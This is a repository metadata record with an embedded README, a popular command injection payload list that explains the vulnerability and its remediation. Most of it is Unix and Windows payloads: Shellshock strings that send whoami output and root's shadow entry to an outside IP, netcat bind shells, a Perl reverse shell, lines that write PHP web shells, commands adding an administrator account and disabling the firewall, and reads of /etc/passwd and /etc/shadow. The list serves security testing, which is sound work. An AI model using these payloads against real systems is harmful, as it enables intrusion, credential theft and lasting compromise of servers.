{"id":13539738,"url":"https://github.com/payloadbox/command-injection-payload-list","last_synced_at":"2025-05-15T01:04:34.451Z","repository":{"id":38362010,"uuid":"156012620","full_name":"payloadbox/command-injection-payload-list","owner":"payloadbox","description":"🎯 Command Injection Payload List","archived":false,"fork":false,"pushed_at":"2024-07-18T03:15:46.000Z","size":24,"stargazers_count":2975,"open_issues_count":3,"forks_count":634,"subscribers_count":73,"default_branch":"master","last_synced_at":"2024-10-29T17:56:25.738Z","etag":null,"topics":["application","application-security","bugbounty","command","command-injection","injection","linux","macos","os","os-injection","payload","payload-list","security","security-research","security-testing","security-vulnerability","unix","vulnerability","vulnerability-research","windows"],"latest_commit_sha":null,"homepage":"https://ismailtasdelen.medium.com","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/payloadbox.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null},"funding":{"github":null,"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":"ismailtasdelen","issuehunt":null,"otechie":null,"custom":null}},"created_at":"2018-11-03T18:35:08.000Z","updated_at":"2024-10-28T16:26:55.000Z","dependencies_parsed_at":"2024-11-19T18:15:41.140Z","dependency_job_id":"711a4558-0461-4b1c-af47-089ed2a5bbf2","html_url":"https://github.com/payloadbox/command-injection-payload-list","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/payloadbox%2Fcommand-injection-payload-list","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/payloadbox%2Fcommand-injection-payload-list/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/payloadbox%2Fcommand-injection-payload-list/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/payloadbox%2Fcommand-injection-payload-list/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/payloadbox","download_url":"https://codeload.github.com/payloadbox/command-injection-payload-list/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248368441,"owners_count":21092360,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["application","application-security","bugbounty","command","command-injection","injection","linux","macos","os","os-injection","payload","payload-list","security","security-research","security-testing","security-vulnerability","unix","vulnerability","vulnerability-research","windows"],"created_at":"2024-08-01T09:01:31.160Z","updated_at":"2025-04-11T09:34:40.187Z","avatar_url":"https://github.com/payloadbox.png","language":null,"readme":"## Command Injection Payload List\n\n\u003cp align=\"center\"\u003e\n  \u003cimg src=\"https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg\"\u003e \u003cimg src=\"https://img.shields.io/github/stars/payloadbox/command-injection-payload-list?style=social\"\u003e \u003cimg src=\"https://img.shields.io/github/forks/payloadbox/command-injection-payload-list?style=social\"\u003e \u003cimg src=\"https://img.shields.io/github/repo-size/payloadbox/command-injection-payload-list\"\u003e \u003cimg src=\"https://img.shields.io/github/license/payloadbox/command-injection-payload-list\"\u003e \u003cimg src=\"https://img.shields.io/github/issues/detail/author/payloadbox/command-injection-payload-list/1\"\u003e\n\u003c/p\u003e\n\nCommand injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.\n\nThis attack differs from Code Injection, in that code injection allows the attacker to add his own code that is then executed by the application. In Command Injection, the attacker extends the default functionality of the application, which execute system commands, without the necessity of injecting code. \n\n## What is OS command injection?\n\nOS command Injection is a critical vulnerability that allows attackers to gain complete control over an affected web site and the underlying web server.\n\nOS command injection vulnerabilities arise when an application incorporates user data into an operating system command that it executes. An attacker can manipulate the data to cause their own commands to run. This allows the attacker to carry out any action that the application itself can carry out, including reading or modifying all of its data and performing privileged actions.\n\nIn addition to total compromise of the web server itself, an attacker can leverage a command injection vulnerability to pivot the attack in the organization's internal infrastructure, potentially accessing any system which the web server can access. They may also be able to create a persistent foothold within the organization, continuing to access compromised systems even after the original vulnerability has been fixed.\n\n## Description :\n\nOperating system command injection vulnerabilities arise when an application incorporates user-controllable data into a command that is processed by a shell command interpreter. If the user data is not strictly validated, an attacker can use shell metacharacters to modify the command that is executed, and inject arbitrary further commands that will be executed by the server.\n\nOS command injection vulnerabilities are usually very serious and may lead to compromise of the server hosting the application, or of the application's own data and functionality. It may also be possible to use the server as a platform for attacks against other systems. The exact potential for exploitation depends upon the security context in which the command is executed, and the privileges that this context has regarding sensitive resources on the server.\n\n## Remediation:\n\nIf possible, applications should avoid incorporating user-controllable data into operating system commands. In almost every situation, there are safer alternative methods of performing server-level tasks, which cannot be manipulated to perform additional commands than the one intended.\n\nIf it is considered unavoidable to incorporate user-supplied data into operating system commands, the following two layers of defense should be used to prevent attacks:\n\n* The user data should be strictly validated. Ideally, a whitelist of specific accepted values should be used. Otherwise, only short alphanumeric strings should be accepted. Input containing any other data, including any conceivable shell metacharacter or whitespace, should be rejected.\n\n* The application should use command APIs that launch a specific process via its name and command-line parameters, rather than passing a command string to a shell interpreter that supports command chaining and redirection. For example, the Java API Runtime.exec and the ASP.NET API Process.Start do not support shell metacharacters. This defense can mitigate\n\n### Unix :\n\n```\n\u0026lt;!--#exec%20cmd=\u0026quot;/bin/cat%20/etc/passwd\u0026quot;--\u0026gt;\n\u0026lt;!--#exec%20cmd=\u0026quot;/bin/cat%20/etc/shadow\u0026quot;--\u0026gt;\n\u0026lt;!--#exec%20cmd=\u0026quot;/usr/bin/id;--\u0026gt;\n\u0026lt;!--#exec%20cmd=\u0026quot;/usr/bin/id;--\u0026gt;\n/index.html|id|\n;id;\n;id\n;netstat -a;\n;system('cat%20/etc/passwd')\n;id;\n|id\n|/usr/bin/id\n|id|\n|/usr/bin/id|\n||/usr/bin/id|\n|id;\n||/usr/bin/id;\n;id|\n;|/usr/bin/id|\n\\n/bin/ls -al\\n\n\\n/usr/bin/id\\n\n\\nid\\n\n\\n/usr/bin/id;\n\\nid;\n\\n/usr/bin/id|\n\\nid|\n;/usr/bin/id\\n\n;id\\n\n|usr/bin/id\\n\n|nid\\n\n`id`\n`/usr/bin/id`\na);id\na;id\na);id;\na;id;\na);id|\na;id|\na)|id\na|id\na)|id;\na|id\n|/bin/ls -al\na);/usr/bin/id\na;/usr/bin/id\na);/usr/bin/id;\na;/usr/bin/id;\na);/usr/bin/id|\na;/usr/bin/id|\na)|/usr/bin/id\na|/usr/bin/id\na)|/usr/bin/id;\na|/usr/bin/id\n;system('cat%20/etc/passwd')\n;system('id')\n;system('/usr/bin/id')\n%0Acat%20/etc/passwd\n%0A/usr/bin/id\n%0Aid\n%0A/usr/bin/id%0A\n%0Aid%0A\n\u0026 ping -i 30 127.0.0.1 \u0026\n\u0026 ping -n 30 127.0.0.1 \u0026\n%0a ping -i 30 127.0.0.1 %0a\n`ping 127.0.0.1`\n| id\n\u0026 id\n; id\n%0a id %0a\n`id`\n$;/usr/bin/id\n() { :;}; /bin/bash -c \"curl http://135.23.158.130/.testing/shellshock.txt?vuln=16?user=\\`whoami\\`\"\n() { :;}; /bin/bash -c \"curl http://135.23.158.130/.testing/shellshock.txt?vuln=18?pwd=\\`pwd\\`\"\n() { :;}; /bin/bash -c \"curl http://135.23.158.130/.testing/shellshock.txt?vuln=20?shadow=\\`grep root /etc/shadow\\`\"\n() { :;}; /bin/bash -c \"curl http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\\`uname -a\\`\"\n() { :;}; /bin/bash -c \"curl http://135.23.158.130/.testing/shellshock.txt?vuln=24?shell=\\`nc -lvvp 1234 -e /bin/bash\\`\"\n() { :;}; /bin/bash -c \"curl http://135.23.158.130/.testing/shellshock.txt?vuln=26?shell=\\`nc -lvvp 1236 -e /bin/bash \u0026\\`\"\n() { :;}; /bin/bash -c \"curl http://135.23.158.130/.testing/shellshock.txt?vuln=5\"\n() { :;}; /bin/bash -c \"sleep 1 \u0026\u0026 curl http://135.23.158.130/.testing/shellshock.txt?sleep=1\u0026?vuln=6\"\n() { :;}; /bin/bash -c \"sleep 1 \u0026\u0026 echo vulnerable 1\"\n() { :;}; /bin/bash -c \"sleep 3 \u0026\u0026 curl http://135.23.158.130/.testing/shellshock.txt?sleep=3\u0026?vuln=7\"\n() { :;}; /bin/bash -c \"sleep 3 \u0026\u0026 echo vulnerable 3\"\n() { :;}; /bin/bash -c \"sleep 6 \u0026\u0026 curl http://135.23.158.130/.testing/shellshock.txt?sleep=6\u0026?vuln=8\"\n() { :;}; /bin/bash -c \"sleep 6 \u0026\u0026 curl http://135.23.158.130/.testing/shellshock.txt?sleep=9\u0026?vuln=9\"\n() { :;}; /bin/bash -c \"sleep 6 \u0026\u0026 echo vulnerable 6\"\n() { :;}; /bin/bash -c \"wget http://135.23.158.130/.testing/shellshock.txt?vuln=17?user=\\`whoami\\`\"\n() { :;}; /bin/bash -c \"wget http://135.23.158.130/.testing/shellshock.txt?vuln=19?pwd=\\`pwd\\`\"\n() { :;}; /bin/bash -c \"wget http://135.23.158.130/.testing/shellshock.txt?vuln=21?shadow=\\`grep root /etc/shadow\\`\"\n() { :;}; /bin/bash -c \"wget http://135.23.158.130/.testing/shellshock.txt?vuln=23?uname=\\`uname -a\\`\"\n() { :;}; /bin/bash -c \"wget http://135.23.158.130/.testing/shellshock.txt?vuln=25?shell=\\`nc -lvvp 1235 -e /bin/bash\\`\"\n() { :;}; /bin/bash -c \"wget http://135.23.158.130/.testing/shellshock.txt?vuln=27?shell=\\`nc -lvvp 1237 -e /bin/bash \u0026\\`\"\n() { :;}; /bin/bash -c \"wget http://135.23.158.130/.testing/shellshock.txt?vuln=4\"\ncat /etc/hosts\n$(`cat /etc/passwd`)\ncat /etc/passwd\n%0Acat%20/etc/passwd\n{{ get_user_file(\"/etc/passwd\") }}\n\u003c!--#exec cmd=\"/bin/cat /etc/passwd\"--\u003e\n\u003c!--#exec cmd=\"/bin/cat /etc/shadow\"--\u003e\n\u003c!--#exec cmd=\"/usr/bin/id;--\u003e\nsystem('cat /etc/passwd');\n\u003c?php system(\"cat /etc/passwd\");?\u003e\n```\n\n### Windows :\n\n```\n`\n|| \n| \n; \n'\n'\"\n\"\n\"'\n\u0026 \n\u0026\u0026 \n%0a\n%0a%0d\n\n%0Aid\n%0a id %0a\n%0Aid%0A\n%0a ping -i 30 127.0.0.1 %0a\n%0A/usr/bin/id\n%0A/usr/bin/id%0A\n%2 -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\\\" |ping -n 21 127.0.0.1\n%20{${phpinfo()}}\n%20{${sleep(20)}}\n%20{${sleep(3)}}\na|id|\na;id|\na;id;\na;id\\n\n() { :;}; curl http://135.23.158.130/.testing/shellshock.txt?vuln=12\n| curl http://crowdshield.com/.testing/rce.txt\n\u0026 curl http://crowdshield.com/.testing/rce.txt\n; curl https://crowdshield.com/.testing/rce_vuln.txt\n\u0026\u0026 curl https://crowdshield.com/.testing/rce_vuln.txt\ncurl https://crowdshield.com/.testing/rce_vuln.txt\n curl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt` #' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\\\" |curl https://crowdshield.com/.testing/rce_vuln.txt\ncurl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt` #' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\\\" |curl https://crowdshield.com/.testing/rce_vuln.txt\n$(`curl https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`)\ndir\n| dir\n; dir\n$(`dir`)\n\u0026 dir\n\u0026\u0026dir\n\u0026\u0026 dir\n| dir C:\\\n; dir C:\\\n\u0026 dir C:\\\n\u0026\u0026 dir C:\\\ndir C:\\\n| dir C:\\Documents and Settings\\*\n; dir C:\\Documents and Settings\\*\n\u0026 dir C:\\Documents and Settings\\*\n\u0026\u0026 dir C:\\Documents and Settings\\*\ndir C:\\Documents and Settings\\*\n| dir C:\\Users\n; dir C:\\Users\n\u0026 dir C:\\Users\n\u0026\u0026 dir C:\\Users\ndir C:\\Users\n;echo%20'\u003cscript\u003ealert(1)\u003c/script\u003e'\necho '\u003cimg src=https://crowdshield.com/.testing/xss.js onload=prompt(2) onerror=alert(3)\u003e\u003c/img\u003e'// XXXXXXXXXXX\n| echo \"\u003c?php include($_GET['page'])| ?\u003e\" \u003e rfi.php\n; echo \"\u003c?php include($_GET['page']); ?\u003e\" \u003e rfi.php\n\u0026 echo \"\u003c?php include($_GET['page']); ?\u003e\" \u003e rfi.php\n\u0026\u0026 echo \"\u003c?php include($_GET['page']); ?\u003e\" \u003e rfi.php\necho \"\u003c?php include($_GET['page']); ?\u003e\" \u003e rfi.php\n| echo \"\u003c?php system('dir $_GET['dir']')| ?\u003e\" \u003e dir.php \n; echo \"\u003c?php system('dir $_GET['dir']'); ?\u003e\" \u003e dir.php \n\u0026 echo \"\u003c?php system('dir $_GET['dir']'); ?\u003e\" \u003e dir.php \n\u0026\u0026 echo \"\u003c?php system('dir $_GET['dir']'); ?\u003e\" \u003e dir.php \necho \"\u003c?php system('dir $_GET['dir']'); ?\u003e\" \u003e dir.php\n| echo \"\u003c?php system($_GET['cmd'])| ?\u003e\" \u003e cmd.php\n; echo \"\u003c?php system($_GET['cmd']); ?\u003e\" \u003e cmd.php\n\u0026 echo \"\u003c?php system($_GET['cmd']); ?\u003e\" \u003e cmd.php\n\u0026\u0026 echo \"\u003c?php system($_GET['cmd']); ?\u003e\" \u003e cmd.php\necho \"\u003c?php system($_GET['cmd']); ?\u003e\" \u003e cmd.php\n;echo '\u003cscript\u003ealert(1)\u003c/script\u003e'\necho '\u003cscript\u003ealert(1)\u003c/script\u003e'// XXXXXXXXXXX\necho '\u003cscript src=https://crowdshield.com/.testing/xss.js\u003e\u003c/script\u003e'// XXXXXXXXXXX\n| echo \"use Socket;$i=\"192.168.16.151\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e;S\");open(STDOUT,\"\u003e;S\");open(STDERR,\"\u003e;S\");exec(\"/bin/sh -i\");};\" \u003e rev.pl\n; echo \"use Socket;$i=\"192.168.16.151\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e;S\");open(STDOUT,\"\u003e;S\");open(STDERR,\"\u003e;S\");exec(\"/bin/sh -i\");};\" \u003e rev.pl\n\u0026 echo \"use Socket;$i=\"192.168.16.151\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e\u0026S\");open(STDOUT,\"\u003e\u0026S\");open(STDERR,\"\u003e\u0026S\");exec(\"/bin/sh -i\");};\" \u003e rev.pl\n\u0026\u0026 echo \"use Socket;$i=\"192.168.16.151\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e\u0026S\");open(STDOUT,\"\u003e\u0026S\");open(STDERR,\"\u003e\u0026S\");exec(\"/bin/sh -i\");};\" \u003e rev.pl\necho \"use Socket;$i=\"192.168.16.151\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e\u0026S\");open(STDOUT,\"\u003e\u0026S\");open(STDERR,\"\u003e\u0026S\");exec(\"/bin/sh -i\");};\" \u003e rev.pl\n() { :;}; echo vulnerable 10\neval('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')\neval('ls')\neval('pwd')\neval('pwd');\neval('sleep 5')\neval('sleep 5');\neval('whoami')\neval('whoami');\nexec('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')\nexec('ls')\nexec('pwd')\nexec('pwd');\nexec('sleep 5')\nexec('sleep 5');\nexec('whoami')\nexec('whoami');\n;{$_GET[\"cmd\"]}\n`id`\n|id\n| id\n;id\n;id|\n;id;\n\u0026 id\n\u0026\u0026id\n;id\\n\nifconfig\n| ifconfig\n; ifconfig\n\u0026 ifconfig\n\u0026\u0026 ifconfig\n/index.html|id|\nipconfig\n| ipconfig /all\n; ipconfig /all\n\u0026 ipconfig /all\n\u0026\u0026 ipconfig /all\nipconfig /all\nls\n$(`ls`)\n| ls -l /\n; ls -l /\n\u0026 ls -l /\n\u0026\u0026 ls -l /\nls -l /\n| ls -laR /etc\n; ls -laR /etc\n\u0026 ls -laR /etc\n\u0026\u0026 ls -laR /etc\n| ls -laR /var/www\n; ls -laR /var/www\n\u0026 ls -laR /var/www\n\u0026\u0026 ls -laR /var/www\n| ls -l /etc/\n; ls -l /etc/\n\u0026 ls -l /etc/\n\u0026\u0026 ls -l /etc/\nls -l /etc/\nls -lh /etc/\n| ls -l /home/*\n; ls -l /home/*\n\u0026 ls -l /home/*\n\u0026\u0026 ls -l /home/*\nls -l /home/*\n*; ls -lhtR /var/www/\n| ls -l /tmp\n; ls -l /tmp\n\u0026 ls -l /tmp\n\u0026\u0026 ls -l /tmp\nls -l /tmp\n| ls -l /var/www/*\n; ls -l /var/www/*\n\u0026 ls -l /var/www/*\n\u0026\u0026 ls -l /var/www/*\nls -l /var/www/*\n\\n\n\\n\\033[2curl http://135.23.158.130/.testing/term_escape.txt?vuln=1?user=\\`whoami\\`\n\\n\\033[2wget http://135.23.158.130/.testing/term_escape.txt?vuln=2?user=\\`whoami\\`\n\\n/bin/ls -al\\n\n| nc -lvvp 4444 -e /bin/sh|\n; nc -lvvp 4444 -e /bin/sh;\n\u0026 nc -lvvp 4444 -e /bin/sh\u0026\n\u0026\u0026 nc -lvvp 4444 -e /bin/sh \u0026\nnc -lvvp 4444 -e /bin/sh\nnc -lvvp 4445 -e /bin/sh \u0026\nnc -lvvp 4446 -e /bin/sh|\nnc -lvvp 4447 -e /bin/sh;\nnc -lvvp 4448 -e /bin/sh\u0026\n\\necho INJECTX\\nexit\\n\\033[2Acurl https://crowdshield.com/.testing/rce_vuln.txt\\n\n\\necho INJECTX\\nexit\\n\\033[2Asleep 5\\n\n\\necho INJECTX\\nexit\\n\\033[2Awget https://crowdshield.com/.testing/rce_vuln.txt\\n\n| net localgroup Administrators hacker /ADD\n; net localgroup Administrators hacker /ADD\n\u0026 net localgroup Administrators hacker /ADD\n\u0026\u0026 net localgroup Administrators hacker /ADD\nnet localgroup Administrators hacker /ADD\n| netsh firewall set opmode disable\n; netsh firewall set opmode disable\n\u0026 netsh firewall set opmode disable\n\u0026\u0026 netsh firewall set opmode disable\nnetsh firewall set opmode disable\nnetstat\n;netstat -a;\n| netstat -an\n; netstat -an\n\u0026 netstat -an\n\u0026\u0026 netstat -an\nnetstat -an\n| net user hacker Password1 /ADD\n; net user hacker Password1 /ADD\n\u0026 net user hacker Password1 /ADD\n\u0026\u0026 net user hacker Password1 /ADD\nnet user hacker Password1 /ADD\n| net view\n; net view\n\u0026 net view\n\u0026\u0026 net view\nnet view\n\\nid|\n\\nid;\n\\nid\\n\n\\n/usr/bin/id\\n\nperl -e 'print \"X\"x1024'\n|| perl -e 'print \"X\"x16096'\n| perl -e 'print \"X\"x16096'\n; perl -e 'print \"X\"x16096'\n\u0026 perl -e 'print \"X\"x16096'\n\u0026\u0026 perl -e 'print \"X\"x16096'\nperl -e 'print \"X\"x16384'\n; perl -e 'print \"X\"x2048'\n\u0026 perl -e 'print \"X\"x2048'\n\u0026\u0026 perl -e 'print \"X\"x2048'\nperl -e 'print \"X\"x2048'\n|| perl -e 'print \"X\"x4096'\n| perl -e 'print \"X\"x4096'\n; perl -e 'print \"X\"x4096'\n\u0026 perl -e 'print \"X\"x4096'\n\u0026\u0026 perl -e 'print \"X\"x4096'\nperl -e 'print \"X\"x4096'\n|| perl -e 'print \"X\"x8096'\n| perl -e 'print \"X\"x8096'\n; perl -e 'print \"X\"x8096'\n\u0026\u0026 perl -e 'print \"X\"x8096'\nperl -e 'print \"X\"x8192'\nperl -e 'print \"X\"x81920'\n|| phpinfo()\n| phpinfo()\n {${phpinfo()}}\n;phpinfo()\n;phpinfo();//\n';phpinfo();//\n{${phpinfo()}}\n\u0026 phpinfo()\n\u0026\u0026 phpinfo()\nphpinfo()\nphpinfo();\n\u003c?php system(\"curl https://crowdshield.com/.testing/rce_vuln.txt?method=phpsystem_get\");?\u003e\n\u003c?php system(\"curl https://crowdshield.com/.testing/rce_vuln.txt?req=df2fkjj\");?\u003e\n\u003c?php system(\"echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX